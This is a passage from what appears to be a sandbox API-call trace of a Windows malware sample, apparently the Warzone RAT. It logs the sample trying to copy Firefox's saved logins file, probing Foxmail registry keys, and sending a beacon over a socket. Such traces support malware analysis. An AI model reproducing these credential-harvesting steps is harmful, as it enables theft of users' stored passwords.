returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0207.713] lstrlenW (lpString="\\") returned 1 [0207.713] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2f80000 [0207.713] lstrlenW (lpString="\\") returned 1 [0207.713] lstrcpyW (in: lpString1=0x2f80000, lpString2="\\" | out: lpString1="\\") returned="\\" [0207.713] lstrlenW (lpString="\\") returned 1 [0207.713] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0207.713] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f55c, dwLength=0x1c | out: lpBuffer=0x415f55c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.713] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0207.714] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.714] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0207.714] VirtualFree (lpAddress=0x2f80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.715] GetProcessHeap () returned 0x900000 [0207.715] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0207.715] lstrlenA (lpString="asoAt.H") returned 7 [0207.715] lstrlenA (lpString="asoAt.H") returned 7 [0207.715] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0207.715] lstrcpyA (in: lpString1=0x2df0000, lpString2="asoAt.H" | out: lpString1="asoAt.H") returned="asoAt.H" [0207.715] lstrlenA (lpString="asoAt.H") returned 7 [0207.715] lstrlenA (lpString="asoAt.H") returned 7 [0207.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2df0000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0207.715] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2f80000 [0207.716] lstrlenA (lpString="asoAt.H") returned 7 [0207.716] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2df0000, cbMultiByte=-1, lpWideCharStr=0x2f80000, cchWideChar=18 | out: lpWideCharStr="asoAt.H") returned 8 [0207.716] lstrlenW (lpString="asoAt.H") returned 7 [0207.716] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3130000 [0207.716] lstrlenW (lpString="asoAt.H") returned 7 [0207.716] lstrcpyW (in: lpString1=0x3130000, lpString2="asoAt.H" | out: lpString1="asoAt.H") returned="asoAt.H" [0207.716] lstrlenW (lpString="asoAt.H") returned 7 [0207.716] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3140000 [0207.717] lstrcpyW (in: lpString1=0x3140000, lpString2="asoAt.H" | out: lpString1="asoAt.H") returned="asoAt.H" [0207.717] VirtualFree (lpAddress=0x3130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.717] VirtualFree (lpAddress=0x2f80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.718] lstrlenW (lpString="asoAt.H") returned 7 [0207.718] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2f80000 [0207.718] lstrcatW (in: lpString1="", lpString2="asoAt.H" | out: lpString1="asoAt.H") returned="asoAt.H" [0207.718] VirtualFree (lpAddress=0x3140000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.719] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.719] GetProcessHeap () returned 0x900000 [0207.719] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0207.719] lstrlenW (lpString="asoAt.H") returned 7 [0207.719] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0207.719] VirtualQuery (in: lpAddress=0x3120000, lpBuffer=0x415f56c, dwLength=0x1c | out: lpBuffer=0x415f56c*(BaseAddress=0x3120000, AllocationBase=0x3120000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.719] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0207.720] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.720] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="asoAt.H" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\asoAt.H") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\asoAt.H" [0207.720] VirtualFree (lpAddress=0x2f80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.720] lstrlenW (lpString=".tmp") returned 4 [0207.720] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2f80000 [0207.721] lstrlenW (lpString=".tmp") returned 4 [0207.721] lstrcpyW (in: lpString1=0x2f80000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0207.721] lstrlenW (lpString=".tmp") returned 4 [0207.721] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\asoAt.H") returned 53 [0207.721] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f55c, dwLength=0x1c | out: lpBuffer=0x415f55c*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.721] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x3120000 [0207.721] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.722] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\asoAt.H", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\asoAt.H.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\asoAt.H.tmp" [0207.722] VirtualFree (lpAddress=0x2f80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.722] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default\\logins.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\logins.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\asoAt.H.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\asoat.h.tmp"), bFailIfExists=0) returned 0 [0207.723] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x2c8 [0207.723] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default\\logins.json") returned 99 [0207.723] VirtualAlloc (lpAddress=0x0, dwSize=0xc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0207.723] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default\\logins.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default\\logins.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default\\logins.json" [0207.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default\\logins.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\logins.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0207.723] ReleaseMutex (hMutex=0x2c8) returned 0 [0207.724] CloseHandle (hObject=0x2c8) returned 1 [0207.724] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.724] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.725] VirtualFree (lpAddress=0x3110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.725] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.725] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.726] GetPrivateProfileStringW (in: lpAppName="Profile1", lpKeyName="Path", lpDefault=0x0, lpReturnedString=0x415f5d0, nSize=0x104, lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="") returned 0x0 [0207.727] FreeLibrary (hLibModule=0x74700000) returned 1 [0207.727] FreeLibrary (hLibModule=0x74960000) returned 1 [0207.727] FreeLibrary (hLibModule=0x748f0000) returned 1 [0207.727] FreeLibrary (hLibModule=0x0) returned 0 [0207.727] FreeLibrary (hLibModule=0x748c0000) returned 1 [0207.727] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.728] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.728] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.728] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.729] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="software\\Aerofox\\FoxmailPreview", ulOptions=0x0, samDesired=0x20019, phkResult=0x415fa80 | out: phkResult=0x415fa80*=0x0) returned 0x2 [0207.729] GetProcessHeap () returned 0x900000 [0207.729] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x54) returned 0x92c800 [0207.729] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0207.730] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0207.730] lstrlenW (lpString="grgew") returned 5 [0207.730] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0207.731] lstrcpyW (in: lpString1=0x2d80000, lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0207.731] lstrlenW (lpString="voeimd") returned 6 [0207.731] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0207.731] lstrcpyW (in: lpString1=0x2de0000, lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0207.731] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0207.731] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0207.732] lstrcpyW (in: lpString1=0x2df0000, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0207.732] lstrlenW (lpString="grgew") returned 5 [0207.732] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0207.732] lstrcpyW (in: lpString1=0x2e20000, lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0207.732] lstrlenW (lpString="voeimd") returned 6 [0207.732] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0207.733] lstrcpyW (in: lpString1=0x2eb0000, lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0207.733] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0207.733] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2f60000 [0207.733] lstrcpyW (in: lpString1=0x2f60000, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0207.733] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.734] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.734] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.734] GetProcessHeap () returned 0x900000 [0207.734] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x54) returned 0x92c860 [0207.734] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0207.735] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0207.735] lstrlenW (lpString="grgew") returned 5 [0207.735] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0207.735] lstrcpyW (in: lpString1=0x2d80000, lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0207.736] lstrlenW (lpString="voeimd") returned 6 [0207.736] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0207.736] lstrcpyW (in: lpString1=0x2de0000, lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0207.736] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0207.736] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0207.736] lstrcpyW (in: lpString1=0x2df0000, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0207.736] lstrlenW (lpString="grgew") returned 5 [0207.737] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0207.737] lstrcpyW (in: lpString1=0x2f70000, lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0207.737] lstrlenW (lpString="voeimd") returned 6 [0207.737] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f80000 [0207.737] lstrcpyW (in: lpString1=0x2f80000, lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0207.737] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0207.738] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x3110000 [0207.738] lstrcpyW (in: lpString1=0x3110000, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0207.738] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.738] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.739] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.739] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0207.740] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0207.740] lstrlenW (lpString="grgew") returned 5 [0207.740] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0207.740] lstrcpyW (in: lpString1=0x2d80000, lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0207.740] lstrlenW (lpString="voeimd") returned 6 [0207.740] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0207.740] lstrcpyW (in: lpString1=0x2de0000, lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0207.741] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0207.741] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0207.741] lstrcpyW (in: lpString1=0x2df0000, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0207.741] lstrlenW (lpString="grgew") returned 5 [0207.741] GetProcessHeap () returned 0x900000 [0207.741] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934878 [0207.741] lstrlenW (lpString="grgew") returned 5 [0207.741] GetProcessHeap () returned 0x900000 [0207.741] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934878, Size=0x10) returned 0x4262748 [0207.741] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.742] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.742] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.742] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0207.743] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0207.743] lstrlenW (lpString="grgew") returned 5 [0207.743] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0207.743] lstrcpyW (in: lpString1=0x2d80000, lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0207.743] lstrlenW (lpString="voeimd") returned 6 [0207.743] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0207.744] lstrcpyW (in: lpString1=0x2de0000, lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0207.744] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0207.744] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0207.744] lstrcpyW (in: lpString1=0x2df0000, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0207.744] lstrlenW (lpString="voeimd") returned 6 [0207.744] GetProcessHeap () returned 0x900000 [0207.744] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x4262748, Size=0x14) returned 0x960870 [0207.744] lstrlenW (lpString="voeimd") returned 6 [0207.744] GetProcessHeap () returned 0x900000 [0207.744] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x960870, Size=0x22) returned 0x93a198 [0207.744] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.745] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.745] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.746] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0207.746] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0207.746] lstrlenW (lpString="grgew") returned 5 [0207.746] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0207.747] lstrcpyW (in: lpString1=0x2d80000, lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0207.747] lstrlenW (lpString="voeimd") returned 6 [0207.747] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0207.747] lstrcpyW (in: lpString1=0x2de0000, lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0207.747] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0207.747] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0207.747] lstrcpyW (in: lpString1=0x2df0000, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0207.747] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0207.748] GetProcessHeap () returned 0x900000 [0207.748] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x93a198, Size=0x26) returned 0x93a168 [0207.748] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0207.748] GetProcessHeap () returned 0x900000 [0207.748] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x93a168, Size=0x5a) returned 0x4262ab8 [0207.748] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.748] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.748] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.749] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75b00000 [0207.749] GetProcAddress (hModule=0x75b00000, lpProcName="MessageBoxA") returned 0x75b6fd1e [0207.749] lstrlenW (lpString="grgew") returned 5 [0207.749] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0207.750] lstrcpyW (in: lpString1=0x2d80000, lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0207.750] lstrlenW (lpString="voeimd") returned 6 [0207.750] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0207.750] lstrcpyW (in: lpString1=0x2de0000, lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0207.750] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0207.750] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0207.751] lstrcpyW (in: lpString1=0x2df0000, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0207.751] GetProcessHeap () returned 0x900000 [0207.751] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x4262ab8, Size=0x5e) returned 0x4262ab8 [0207.751] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.751] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.751] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.752] GetProcessHeap () returned 0x900000 [0207.752] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934878 [0207.752] GetProcessHeap () returned 0x900000 [0207.752] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934878, Size=0x8) returned 0x934958 [0207.752] GetProcessHeap () returned 0x900000 [0207.752] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934958, Size=0xc) returned 0x4262748 [0207.752] GetProcessHeap () returned 0x900000 [0207.752] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x4262748, Size=0x6a) returned 0x4262b20 [0207.752] GetProcessHeap () returned 0x900000 [0207.752] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x6a) returned 0x4262b98 [0207.752] GetProcessHeap () returned 0x900000 [0207.752] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262ab8 | out: hHeap=0x900000) returned 1 [0207.752] GetProcessHeap () returned 0x900000 [0207.752] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262b20 | out: hHeap=0x900000) returned 1 [0207.752] lstrlenA (lpString="warzone160") returned 10 [0207.752] lstrlenA (lpString="warzone160") returned 10 [0207.752] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0207.753] lstrcpyA (in: lpString1=0x2d80000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0207.753] lstrlenA (lpString="warzone160") returned 10 [0207.753] GetProcessHeap () returned 0x900000 [0207.753] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262748 [0207.753] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.753] GetProcessHeap () returned 0x900000 [0207.753] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x6a) returned 0x4262ab8 [0207.753] GetProcessHeap () returned 0x900000 [0207.753] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x4262760 [0207.753] GetProcessHeap () returned 0x900000 [0207.753] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x6a) returned 0x4262c10 [0207.753] GetProcessHeap () returned 0x900000 [0207.753] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x6a) returned 0x4262c88 [0207.753] GetProcessHeap () returned 0x900000 [0207.753] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262c10 | out: hHeap=0x900000) returned 1 [0207.753] GetProcessHeap () returned 0x900000 [0207.754] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262760 | out: hHeap=0x900000) returned 1 [0207.754] GetProcessHeap () returned 0x900000 [0207.754] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262ab8 | out: hHeap=0x900000) returned 1 [0207.754] send (s=0x228, buf=0x4262c88*, len=106, flags=0) returned 106 [0207.754] GetProcessHeap () returned 0x900000 [0207.755] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262c88 | out: hHeap=0x900000) returned 1 [0207.755] GetProcessHeap () returned 0x900000 [0207.755] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262748 | out: hHeap=0x900000) returned 1 [0207.755] GetProcessHeap () returned 0x900000 [0207.755] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x4262b98 | out: hHeap=0x900000) returned 1 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.755] VirtualFree (lpAddress=0x3110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.756] VirtualFree (lpAddress=0x2f80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.756] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0207.757] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 